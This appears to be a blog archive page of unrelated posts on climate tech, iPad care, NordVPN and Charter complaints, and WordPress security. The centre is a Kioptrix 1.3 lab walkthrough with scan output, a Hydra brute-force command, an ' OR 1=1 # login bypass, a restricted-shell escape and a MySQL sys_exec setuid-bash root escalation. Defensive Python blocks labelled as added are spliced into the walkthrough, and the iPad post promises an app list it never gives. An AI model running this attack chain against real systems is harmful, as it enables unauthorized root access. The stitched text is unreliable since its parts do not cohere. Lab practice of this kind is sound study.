Technology Can Save the World!

For a lot of people, we’re living in pretty scary times. Climate change is the sort of thing that seems so huge that it often feels as though there’s pretty much nothing that we can do about it. For some, the solution is just to avoid thinking about it, something that is certainly not going to do anyone any good! But that doesn’t mean that you should just be constantly worrying about it either. In fact, there are some things that are making a real difference to our impact on the environment, and many of those things are coming from the world of technology. There has been a major push over the last few years toward tech that can help work against the damage that has been done to the planet. So, in the spirit of helping people feel a little bit more positive about the world we live in, here are some amazing ways that technology is saving the world.

Solar power

It’s truly amazing that such an incredible, renewable source of power and energy has been right under our noses for so long. Of course, the problem for the longest time has been how to actually harness that power in a useful and productive way. Over the last couple of decades, there have been some incredible advances in solar technology, and some that are just around the corner might revolutionize it all over again. Things like solar windows have shown that it’s possible to integrate solar cells into all manner of items. Check out this article on powertechnology.com to find out more about the incredible things that solar windows can do. Within the next couple of decades, solar cells could be incorporated into pretty much anything: homes, clothes; you name it!

Electric vehicles

Let’s face it, the burning of fossil fuels is the major source of humanity’s impact on climate change. Of course, a great deal of that impact is down to large companies, factories, and industries, but that doesn’t mean there isn’t also an impact on a more personal level. The vehicles that we drive have undoubtedly had an impact on the environment. The issue is that we simply need our vehicles to get around. That’s where companies like theelectricrider.com come in. By producing affordable electric vehicles, companies like this are making clean, energy-efficient transport available to far more people than ever before.

Nuclear energy

A lot of people tend to feel very odd at even the slightest mention of nuclear energy. The image of radioactive disasters and massive destruction ends up coloring people’s opinions, despite the fact that it has the potential to be an incredibly clean, renewable resource. There are now new types of reactors that are designed to turn nuclear waste into power. We’re not quite at the level of nuclear fusion yet, but many of these fission reactors are far safer and more viable than anyone could have ever predicted. Many of these reactors aim to put the fears and concerns that many people have about nuclear energy to bed permanently.

The iPad Health Dump

The iPad has literally changed the way we are entertained over the last few years. At first, it received some criticism: some said it was just a big phone without the phone, and that it had various security issues. However, it has stood the test of time and has become a grade-A companion for millions of people across the world. The iPad is used expertly by many, but there are still some areas of concern. So, here are some hints and tips that can not only help you get the best out of your iPad, but keep it safe too.

Use A Case

So many people don’t use cases or screen protectors. An iPad’s size makes it more vulnerable to a drop than a phone. Make sure you protect it. Get a solid back case that wraps around the screen when not in use. You can use a screen protector too if you wish to keep the screen free from scratches and abrasions. You can find some cool cases at ithingum.com. What you use it for dictates the case you need. For example, if you work on a construction site, get something solid and hard, but if you use it around the house, something softer is fine. Don’t ruin your iPad with a silly drop. Mistakes happen, so protect it as much as you can.

Virus Protection

Staying with protection, you also need to protect it from external threats. Many people think their phones and tablets aren’t at risk from viruses, but they are essentially computers and can be infected just the same. If you open a dodgy email attachment designed to attack iOS, you could be in trouble. iPads have built-in security, but you would be better off using software to protect them from attack. You could lose all kinds of photos, messages, and other memories if you haven’t backed up in some time. Here are some of the better security apps you can make the most of.

Don’t Leave It In Direct Sunlight

You may have seen the warning message that comes up saying the device cannot be used until it has cooled down. This is a great addition by Apple that can stop it breaking, but remember, it still gets damaged. Heat can sizzle the internal components. You may not notice anything right away, but over time it may become sluggish and stop charging properly. Don’t leave it in direct sunlight because it will be damaged; if you have to, keep it face down and under a cover for extra shade.

Charge It Right

Try to ensure you charge the device correctly so that it doesn’t lose charge over time. The newer products are better, but if you have an older one and you don’t charge it properly, you could end up losing huge chunks of charge. This is why it sometimes jumps from a certain percentage down to one or two: the device is simply confused. You can find the correct charging methods from Apple themselves.

Kioptrix Level 1.3 (VM #4) Walkthrough

In my efforts to self-study in preparation for the OSCP certification later this year, I’ve been going through some of the intentionally vulnerable Virtual Machines (VMs) on vulnhub.com to sharpen and broaden my penetration testing and hacking skills. Among others I’ve completed, the Kioptrix series of VMs is allegedly similar to what you see in the actual OSCP test, so I’ve been going through them in order.

Part of completing the OSCP is providing a write-up of your hacking adventures to explain how and what you did to hack a server, so I figured I better start now. Other folks do similar write-ups on the VMs on vulnhub.com, and I’ll see if they will add this to the Kioptrix 1.3 page soon.

Hopefully, someone will find this useful either way.

It should be noted that this VM was known to have at least two possible paths to getting root on the system, and this write-up outlines just one.

Discovery

On my local network, this VM turned up with the IP address of 192.168.0.110.

nmap

Running an nmap scan revealed some open ports and running services:

root@kali:~# nmap -v -sS -A -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
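The scan output above is the kind of thing a defender should be able to turn into an inventory and compare against a patch policy, rather than reading by eye. The following is an added example, not part of the original write-up: it parses the port table in nmap's normal output and flags banners whose version falls below a configured floor. The `MIN_VERSIONS` floors are assumed policy values chosen for the demo, not figures from the page, and the sample text is copied from the scan shown above.

```python
import re

# Service lines copied from the nmap output in the write-up above; the
# header line is kept to show the parser skipping it.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
"""

# port/proto  state  service  free-text version banner
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Oldest version still acceptable per product. These floors are assumed
# policy values for the demo, not figures from the write-up.
MIN_VERSIONS = {"OpenSSH": (7, 0), "Apache httpd": (2, 4), "Samba smbd": (4, 0)}


def parse_ports(text):
    """Turn nmap's normal-output port table into a list of dicts."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, blank or script-output line
        port, proto, state, service, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version})
    return services


def version_tuple(text):
    """Leading dotted version as a tuple of ints: ' 4.7p1 Debian' -> (4, 7).
    Returns None for a range such as '3.X - 4.X', which nmap emits when it
    could not pin the version down, so that guess is never compared."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)(?!\.X)", text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def flag_outdated(services, minimums=MIN_VERSIONS):
    """(port, product, version) for every banner below its configured floor."""
    flagged = []
    for svc in services:
        for product, floor in minimums.items():
            if not svc["version"].startswith(product):
                continue
            ver = version_tuple(svc["version"][len(product):])
            if ver is not None and ver < floor:
                flagged.append((svc["port"], product, ".".join(map(str, ver))))
    return flagged


if __name__ == "__main__":
    for port, product, ver in flag_outdated(parse_ports(NMAP_OUTPUT)):
        print(f"{port}/tcp {product} {ver} is below the policy floor")
```

The 139/tcp banner is deliberately left out of the verdict: nmap could only say "3.X - 4.X" there, while 445/tcp gave the exact Samba 3.0.28a, which is what gets judged. Banner grabbing is an approximation of patch level (distributions backport fixes without changing the version string), so a flag here is a prompt to check the package database, not proof of a vulnerability.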

Poking Around

Checking things out by hand based on the nmap scan results, I found there was a login page running on port 80 at http://192.168.0.110

No basic SQL injection worked in my initial attempts.

Nothing in the source code of note. Some other basic manual fuzzing and poking around didn’t reveal much either.

Nikto

Nikto turned up some basic stuff about Apache that I thought might be worth looking into later:

Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.

dirb and dirsearch

A basic dirb scan turned up a directory:
http://192.168.0.110/john/

I thought that could be a username. Running dirb with a bigger wordlist (big.txt in Kali) turned up another one:
http://192.168.0.110/robert/

Both of those directories contained a file (robert.php and john.php) that, when clicked, would just redirect you back to the main login page.

I also ran dirsearch, a Python tool that also works well for finding directories and files.
found file: database.sql

(Note: dirsearch is not included in Kali by default. It requires you to set up Python 3 in a virtual environment to run it.)

enum4linux

Since ports 139 and 445 were being used, I went on to try enum4linux:

root@kali:~# enum4linux -a 192.168.0.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 9 00:40:35 2017

(Pasting only the relevant stuff here.)
 ===================================================== 
| Enumerating Workgroup/Domain on 192.168.0.110 |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

============================================= 
| Nbtstat Information for 192.168.0.110 |
 ============================================= 
Looking up status of 192.168.0.110
 KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
 KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
 KIOPTRIX4 <20> - B <ACTIVE> File Server Service
 ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
 WORKGROUP <1d> - B <ACTIVE> Master Browser
 WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
 WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

============================== 
| Users on 192.168.0.110 |
 ============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

========================================== 
| Share Enumeration on 192.168.0.110 |
 ========================================== 
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment
 --------- -------
 KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master
 --------- -------
 WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.0.110
//192.168.0.110/print$ Mapping: DENIED, Listing: N/A
//192.168.0.110/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

===================================================== 
| Password Policy Information for 192.168.0.110 |
 ===================================================== 
[E] Unexpected error from polenum:
Traceback (most recent call last):
 File "/usr/bin/polenum", line 33, in <module>
 from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)

enum4linux complete on Thu Feb 9 00:40:51 2017

acccheck

I ran acccheck on the ‘robert’ user with the big.txt pw list, to no avail. Can circle back to try the other usernames if needed.

THC Hydra

You can use Hydra to brute force FTP, SSH, POP3, and SMTP accounts. Let’s try Hydra with those usernames to find SSH accounts! Trying the usernames found via acccheck with SSH logins:

robert
root
loneferret
john

hydra -L users -P 10_million_password_list_top_100000.txt -t 4 192.168.0.110 ssh -vv

Nothing turned up! Bummer.

database.sql

This was found during discovery with dirsearch, and it appears to be a short MySQL dump file. Since other avenues were turning out to be fruitless, I thought I’d give this a closer look.

Immediately, the first thing to note is that there’s a username and password shown in the dump file.

john
1234

Let’s try it on the HTML login form at http://192.168.0.110/index.php?. No luck!
I thought maybe that was a default password, so I tested it on the other known users as well (robert, root, loneferret), but still no luck.

Perhaps it’d work with SSH or SMB?
Negatory

The file at least led me to believe MySQL was in place, so perhaps some more SQLi exploration would help.

After a number of failed attempts and errors by trying various SQL injection strings, using this worked:

Username: john
Password: ' OR 1=1 #

That took me to the User Admin Panel and showed the actual password.

That seemed kinda easy. But this is when things got hard, actually.

I logged out and confirmed that the password worked. It logged me back into that same page. But what good is that? Let’s try SSH again!

Shell obtained. However, the shell seemed to be extremely limited. As instructed at login, typing ? or ‘help’ gets you a list of allowed commands:

I was warned about trying to cd into the root directory, and getting kicked out if I tried again.

lpath is the same as pwd.

The only available command that looks somewhat useful is echo. Let’s see if we can echo the contents of .profile:

Uh oh. It really did kick me out! Luckily, all I had to do was reconnect via SSH. Let’s try a different file:

Bummer. How about getting around now that we know it is possible to simply re-log via SSH if you get kicked out? No luck.

Must break out of the restricted “LigGoat” shell. To the Google!

Searching for “escape restricted shell echo” I found a handy article:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Trying a number of things, I finally found the right trick, which is to use Python to switch shells:

echo os.system("/bin/bash")

That was weird, but it worked, and I got a less restricted shell. This website was of much help to find the specific command needed: http://netsec.ws/?p=337

Finally, a useful shell. Well, more useful. It still seems to be a basic user account with no real privileges. So where to next? MySQL exists and can be leveraged to take over a box under the right circumstances, so before exploring other vectors, I decided to start with it.

MySQL

Revisiting the web directory and the application running on the website, I found a handy SQL statement in checklogin.php. This statement included the MySQL connection string, with a username and password that were simply:

user: root
pass: (empty)

That suggested the root password was never changed when MySQL was installed, so this was probably a default installation with few tweaks or security enhancements. Sure enough, I was able to log in:
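Two defects in the web application carried this box: the login form let `' OR 1=1 #` rewrite the WHERE clause, and checklogin.php connected as MySQL root with no password. The example below is added here and is not code from the write-up or from the Kioptrix VM. It shows the string-built query that the bypass defeats next to the parameterized form that stops it, using an in-memory SQLite table with constructed users and passwords; because SQLite uses `--` for comments where MySQL also accepts `#`, the payload is written as `' OR 1=1 --` in the demo.

```python
import sqlite3

# Constructed sample table standing in for the web app's members table.
# The usernames echo the write-up; the passwords are made up here, and are
# stored in the clear only to keep the demo short (a real app stores a
# salted hash and compares against that).
SAMPLE_USERS = [("john", "s3cret-john"), ("robert", "s3cret-robert")]


def make_db():
    """Build an in-memory SQLite database with the sample members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string formatting, the pattern the ' OR 1=1
    payload defeats: user input becomes part of the SQL text, so a quote
    closes the literal and the rest is parsed as logic."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same check with bound parameters: the driver passes the values
    separately from the query text, so quotes or comment markers in the
    input are compared as data and never alter the WHERE clause."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR 1=1 --"  # the write-up's payload, SQLite comment syntax
    print("vulnerable:", login_vulnerable(conn, "john", payload))  # a username
    print("hardened:  ", login_hardened(conn, "john", payload))    # None
```

With the string-built query the payload turns the clause into `(username='john' AND password='') OR 1=1`, which matches every row, so the first user is "logged in"; the bound-parameter version compares the literal string against the password column and finds nothing. The connection string is the other half of the fix: the application should connect as a dedicated account granted only what the form needs (in MySQL, `CREATE USER` plus a `GRANT SELECT` on the members table), never as `root`, so that a later injection cannot reach administrative functions.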

Things got off track for a while here, as I wasn’t really sure what to do from this point. However, this Google search helped me:

mysql root pwn server

That led me to a Facebook post, of all things:

https://www.facebook.com/notes/security-training-share/mysql-root-to-system-root-with-lib_mysqludf_sys-for-windows-and-linux/865458806817957/

It described the situation perfectly:

“We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.”

The necessary lib file was already at /usr/lib/lib_mysqludf_sys.so which meant I didn’t need to grab it from sqlmap and upload it to the system.

Modifying those instructions a little, there was no need to compile a C script (which I was unable to do as user ‘john’ anyway).

Where that article has this line:

select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');

Just do this instead:

select sys_exec('chmod u+s /bin/bash');

Then drop out of MySQL and run this:

bash -p

It should drop you into a root shell!

cd /root

cat congrats.txt
Root obtained. Mission complete!
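The last step of the escalation leaves a durable artifact: /bin/bash with mode 4755. A setuid inventory compared against a known-good baseline catches that, whichever route was used to set the bit. The example below is added here, not code from the write-up; it walks a directory tree, lists regular files with the setuid bit, and reports those whose name is not on an allowlist. The allowlist is an assumption for the demo, and the fixture is a constructed temporary tree standing in for /bin so the check runs offline.

```python
import os
import stat
import tempfile

# Setuid binaries a stock install is expected to carry. This allowlist is an
# assumption for the demo; a real baseline is taken from a known-good host
# (for example with find / -perm -4000) and kept under change control.
KNOWN_SETUID = {"passwd", "su", "sudo", "mount", "umount", "ping", "chsh"}


def find_setuid(root):
    """Return the sorted paths of regular files under root with the setuid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # vanished or unreadable entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_setuid(root, allowlist=KNOWN_SETUID):
    """Setuid files whose basename is not on the allowlist, such as a
    /bin/bash that has gained mode 4755."""
    return [p for p in find_setuid(root) if os.path.basename(p) not in allowlist]


def build_fixture():
    """Constructed stand-in for /bin: a temp tree with one legitimate setuid
    binary (passwd), one that must never be setuid (bash), and a normal file."""
    root = tempfile.mkdtemp(prefix="suidcheck_")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("bash", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = build_fixture()
    for path in unexpected_setuid(root):
        print("unexpected setuid binary:", path)
```

Run against a real host, `find_setuid("/")` replaces the fixture and the allowlist comes from the baseline; pairing the check with a file-integrity tool or an audit rule on `chmod` of system binaries gives the alert at the moment the bit is set rather than at the next scan. The write-up also notes that lib_mysqludf_sys.so was already present on the box, so the presence of that library and of a `sys_exec` entry in `mysql.func` belongs on the same review list.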

 

NordVPN’s Bait and Switch

The old bait and switch: promise you one thing and sell you another. That’s what happened when I signed up for a year of VPN service through NordVPN. Their website said:

“Easiest VPN Ever. To get on NordVPN, just click and go. NordVPN’s secure VPN software takes care of all the hard stuff so you can focus on fun stuff. And work stuff, if you have to.”

Their imagery showed multiple devices running their software, including phones and laptops.

I had read about their service and took the plunge. After I had paid, I found out they do not have an app for Mac OS X or Android. Those apps are supposedly coming soon, but not yet. For now, you have to download a third-party app for each device, download a bunch of configuration files, install said configuration files, configure a bunch of things, remember your username and password for each configuration file, and then figure out what is going on and whether or not you are actually connected.

To be fair, they do have instructions on how to do all of this, but it is far from “Easiest VPN Ever.” Every other VPN app I have used is a simple app you download and click a button to get going with.

I chatted with NordVPN’s technical support guy, “Dave,” who informed me of their refund policy, which states that unless their product did not work due to a fault of their own, I could not get a refund for my money. All he could do was extend my subscription by 3 months.

(01:30:40) David: if the service does not work we will issue a refund.
(01:31:17) Visitor 34392357: that is my point – it doesn’t work as you advertise it. it only works through a lengthy process of installing other software.

I would argue that their product does not work as advertised and I am entitled to a refund. In fact, it’s not even their product I am using — I am using something called “Tunnelblick” on my Mac, and an app called OpenVPN on my Android phone to connect to the NordVPN servers.

In summary, the bait was the promise of an easy to use VPN app. The switch was not even having an app for me to use.

Are You Putting Your WordPress Site at Risk?

WordPress as a platform has been a solid, secure application over the years. The few times a vulnerability has been found, the WP team has been super-fast to patch it, publicize it, and take care of business.

That said, there are two major areas where WordPress lacks in security:

1. Plugins

2. Administrators

There are so many plugins for WordPress, which is part of what makes it so great. However, those plugins can also present attack vectors, and we see evidence of this almost every day.

It was just revealed that most WP users have very little understanding of the risk they are exposing their own websites to. Not updating plugins, not updating WP itself, and not doing backups are the most easily fixed things that people tend not to do.

This puts WP websites at risk, lets them get hacked, and gives WordPress as a whole a bad rap.

The survey of 503 WordPress users, which took place online during February this year, revealed that WordPress users are more exposed to security problems than expected. In total, 54 percent of respondents said they updated WordPress between once a week and every few weeks, and yet only 24 percent back their websites up — and only 23 percent have received training in the use of tools such as backup plugins.

ZDNet

On that note, I thought I’d mention that the most popular SEO plugin for WordPress, Yoast’s WP SEO, has a new, major vulnerability in it. GO UPDATE!

Charter Communications Nightmare

Big fat meanie heads.

I’m not sure anyone will want to read this entire post, but I wanted to share it and document it in case anyone else finds themselves in the same boat.

Charter Communications is a bad, bad company. Charter Communications has terrible customer service. Here is my story.

We bought and moved into a new house in July. We called to have Charter set up a couple of days before we moved in, and their Residential department said they did not service our address because the line was over 1000 feet away. However, there was a Charter box at the end of our driveway, roughly 35 feet from the house, and the people who sold us the house guaranteed that Charter was available. Our new neighbors have Charter Business being served from that box, so Charter was clearly available.

I called Charter Business, and they said they could definitely service us from that box. It’d be a little more money each month, but we knew we needed it, so we jumped in. We were assigned a friendly Business representative who was very helpful in getting us all set up. At this time, we were told we could cancel and get a refund within 30 days.

A couple of weeks into the Business service, I called Residential back, just to see if they could switch us over since we were unhappy with our Business account, and since we clearly had Charter access at our house now. With Business, we were paying more for fewer features, such as a poorer channel lineup, no music channels, and no On Demand. They said they could definitely help us, however, we’d need to have Business cancelled separately since they were “two separate things” in Charter. They said that there was nothing they could do to make a seamless switch, and that they’d have to treat this as a new service being set up.

They sent a Charter Residential technician to come out and set up our new Residential service. He said he had to replace all of our HD boxes and our modem with new ones since this was considered a new setup. I thought that was silly, but he swapped out all the hardware, got us set up, took the old hardware with him, and went on his way.

The next day, I called Business, as instructed by Residential, and asked them to cancel our service. They obliged. Unfortunately, they also sent a guy out who promptly disconnected our service altogether. Apparently, he didn’t know we had switched over to Residential service.

We had to call and schedule an appointment for reconnection. You know how appointments go: they give you a 4 hour window in which you must come home from work early for, only for them to arrive late. It turned out we didn’t even need to be there for the reconnection to occur, but they didn’t tell us that ahead of time. A pain, but they got us reconnected. We went about our lives, thinking this was all over.

Then we got the bill from Charter Business in the mail. They wanted us to pay for the first month of service and three missing HD boxes: the boxes that the Residential technician took with him when he switched over. The bill was about $650.

Here we were with none of the hardware they said we had, thinking we’d actually be getting a refund since we cancelled within 30 days. Instead we got a $650 bill!

I promptly called the Business billing folks to clear up the situation. They filed a lost equipment report of some kind regarding the HD boxes and said they’d let me know the results the next day. Then, they told me that because this was not a “change of service” or a “switch” that we didn’t qualify for the 30 day refund. I told them that when I called to switch from Business to Residential, I was told I couldn’t do a switch, that it had to be two separate transactions. The customer service rep said it didn’t matter. I got off the phone, exasperated.

The next day, they didn’t call me about the missing equipment report as promised. I called them back to find out the status, but there was no record of it on my account, apparently. So they filed another one.

I also asked about the refund again. This time, I got a whole different story. Wait until you hear this. The Billing customer service lady told me that because I didn’t mention the 30 day refund when I cancelled service, I didn’t qualify for it. I asked her how I was supposed to know I had to mention it, and she said I should have known based on commercials or advertisements. That seemed absolutely insane to me. After asking to talk to a manager, which she wouldn’t let me do, she told me I’d need to talk to my original Business sales rep about it since he was the only one who could reverse the charges or do anything about it.

So, I emailed him back and explained the situation. He said that he couldn’t do a thing, and that I’d have to call Billing. I told him that they sent me to him, but he never emailed me back.

At this point, I filed a complaint with the FCC.

Then, I started getting calls from a strange number at all hours of the day. I finally answered and it was an “equipment recovery” company (aka collections agency) attempting to find the missing HD boxes. They were persistent, even though I told them what happened. Finally, they made a note of it on my account and let me go. I still got a letter from them saying the same thing: that my HD boxes needed to be turned in or I’d owe $125 each.

Charter CEO Thomas Rutledge makes over $2 million a year. I don’t.

I haven’t heard from Charter since the FCC complaint, but I did hear from the collections company again. This time it was about the cable modem from the business account. I told them that the Charter technician took it with him. The guy said he’d make a note of it.

So that is where I am after almost 2 months of this rigmarole. I have yet to see a credit to my account from Charter Business. It would be about $239, which I really don’t think I need to pay since I cancelled within the 30 day trial period. They have since sent me another bill asking me to pay up.

I’ll update this post as I learn more. Maybe Thomas Rutledge, the Charter CEO, will see this and realize how screwed up his company is. One can hope, anyway.

Update 9/28/14: Here are the terms of the Charter Business 30 Day Guarantee. I certainly don’t see anything in there that suggests I don’t qualify for it.

Update January, 2015: I received a phone call from a Charter Business representative not long after this blog post came out. He assured me that he would have an account specialist look into the situation and that I’d soon hear back from him on the status. I never heard anything. I also never got another bill from Charter Business!